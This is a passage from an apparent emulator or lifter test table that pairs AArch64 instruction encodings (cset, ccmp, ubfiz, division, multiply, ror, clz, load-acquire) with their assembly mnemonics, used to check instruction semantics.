("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\xc2\xfd\xbf\xd2", "movz x2, #0xffee, lsl #16"),
("\x20\x00\x42\xfa", "ccmp x1, x2, 0, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x21\x00\x42\xfa", "ccmp x1, x2, 1, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x22\x00\x42\xfa", "ccmp x1, x2, 2, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x23\x00\x42\xfa", "ccmp x1, x2, 3, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x24\x00\x42\xfa", "ccmp x1, x2, 4, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x25\x00\x42\xfa", "ccmp x1, x2, 5, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x26\x00\x42\xfa", "ccmp x1, x2, 6, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x27\x00\x42\xfa", "ccmp x1, x2, 7, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x28\x00\x42\xfa", "ccmp x1, x2, 8, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x29\x00\x42\xfa", "ccmp x1, x2, 9, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2a\x00\x42\xfa", "ccmp x1, x2, 10, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2b\x00\x42\xfa", "ccmp x1, x2, 11, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2c\x00\x42\xfa", "ccmp x1, x2, 12, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2d\x00\x42\xfa", "ccmp x1, x2, 13, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2e\x00\x42\xfa", "ccmp x1, x2, 14, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2f\x00\x42\xfa", "ccmp x1, x2, 15, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x41\x14\x82\x9a", "cinc x1, x2, eq"),
("\x41\x04\x82\x9a", "cinc x1, x2, ne"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\xfc\x40\xd3", "ubfiz x0, x1, #0, #64"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf8\x7f\xd3", "ubfiz x0, x1, #1, #63"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf4\x7e\xd3", "ubfiz x0, x1, #2, #62"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xf0\x7d\xd3", "ubfiz x0, x1, #3, #61"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xec\x7c\xd3", "ubfiz x0, x1, #4, #60"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe8\x7b\xd3", "ubfiz x0, x1, #5, #59"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe4\x7a\xd3", "ubfiz x0, x1, #6, #58"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xe0\x79\xd3", "ubfiz x0, x1, #7, #57"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\xdc\x78\xd3", "ubfiz x0, x1, #8, #56"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x7c\x7a\xd3", "ubfiz x0, x1, #6, #32"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x78\xd3", "ubfiz x0, x1, #8, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x41\xd3", "ubfiz x0, x1, #63, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x18\x53", "ubfiz w0, w1, #8, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x00\x01\x53", "ubfiz w0, w1, #31, #1"),
("\x00\x00\x80\xd2", "movz x0, #0"),
("\x00\x04\x00\xd1", "sub x0, x0, #1"),
("\x20\x7c\x00\x53", "ubfiz w0, w1, #0, #32"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x08\xc2\x9a", "udiv x0, x1, x2"),
("\x40\x08\xc1\x9a", "udiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x20\x08\xc2\x9a", "udiv x0, x1, x2"),
("\x40\x08\xc1\x9a", "udiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x0c\xc2\x9a", "sdiv x0, x1, x2"),
("\x40\x0c\xc1\x9a", "sdiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x20\x0c\xc2\x9a", "sdiv x0, x1, x2"),
("\x40\x0c\xc1\x9a", "sdiv x0, x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x7c\xa2\x9b", "umull x0, w1, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\x00\x7c\xa2\x9b", "umull x0, w0, w2"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x7c\xc1\x9b", "umulh x0, x1, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x00\x7c\xc1\x9b", "umulh x0, x0, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\xfc\xa2\x9b", "umnegl x0, w1, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x00\xfc\xa2\x9b", "umnegl x0, w0, w2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x2c\xc2\x9a", "ror x0, x1, x2"),
("\x40\x2c\xc1\x9a", "ror x0, x2, x1"),
("\x40\x00\xc2\x93", "ror x0, x2, #0"),
("\x40\x04\xc2\x93", "ror x0, x2, #1"),
("\x40\x08\xc2\x93", "ror x0, x2, #2"),
("\x40\x0c\xc2\x93", "ror x0, x2, #3"),
("\x40\x10\xc2\x93", "ror x0, x2, #4"),
("\x40\xf8\xc2\x93", "ror x0, x2, #62"),
("\x40\xfc\xc2\x93", "ror x0, x2, #63"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x80\xd2", "mov x1, #0"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x41\x00\x80\xd2", "mov x1, #1 << 1"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x81\x00\x80\xd2", "mov x1, #1 << 2"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x82\xd2", "mov x1, #1 << 12"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\x82\xd2", "mov x1, #1 << 12"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xb0\xd2", "mov x1, #1 << 31"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x21\x00\xc0\xd2", "mov x1, #1 << 32"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x41\x00\xc0\xd2", "mov x1, #1 << 33"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xe8\xd2", "mov x1, #1 << 62"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x01\x00\xf0\xd2", "mov x1, #1 << 63"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x00\x00\x80\x92", "movn x0, #0"),
("\x21\x00\x80\xd2", "mov x1, #1 << 64"),
("\x20\x10\xc0\xda", "clz x0, x1"),
("\x20\x10\xc0\x5a", "clz w0, w1"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\xc8", "ldar x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\xc8", "ldar x9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\xc8", "ldar x11, [sp]"),
("\xff\xff\xdf\xc8", "ldar xzr, [sp]"),
("\xe7\xff\xdf\x88", "ldar w7, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\x08", "ldarb w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\x08", "ldarb w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\x08", "ldarb w11, [sp]"),
("\xff\xff\xdf\x08", "ldarb wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\xdf\x48", "ldarh w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\xdf\x48", "ldarh w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\xdf\x48", "ldarh w11, [sp]"),
("\xff\xff\xdf\x48", "ldarh wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\xc8", "ldaxr x5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\xc8", "ldaxr x9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\xc8", "ldaxr x11, [sp]"),
("\xff\xff\x5f\xc8", "ldaxr xzr, [sp]"),
("\xe7\xff\x5f\x88", "ldaxr w7, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\x08", "ldaxrb w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\x08", "ldaxrb w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
("\xeb\xff\x5f\x08", "ldaxrb w11, [sp]"),
("\xff\xff\x5f\x08", "ldaxrb wzr, [sp]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x02\x02\x80\xd2", "movz x2, #16"),
("\x25\xfc\x5f\x48", "ldaxrh w5, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\x21\xc8\x00\x91", "add x1, x1, #50"), # HEAP+50 address
("\x29\xfc\x5f\x48", "ldaxrh w9, [x1]"),
("\x01\x04\xa0\xd2", "movz x1, #0x20, lsl #16"), # STACK address
("\x3f\x10\x00\x91", "add sp, x1, #4"),
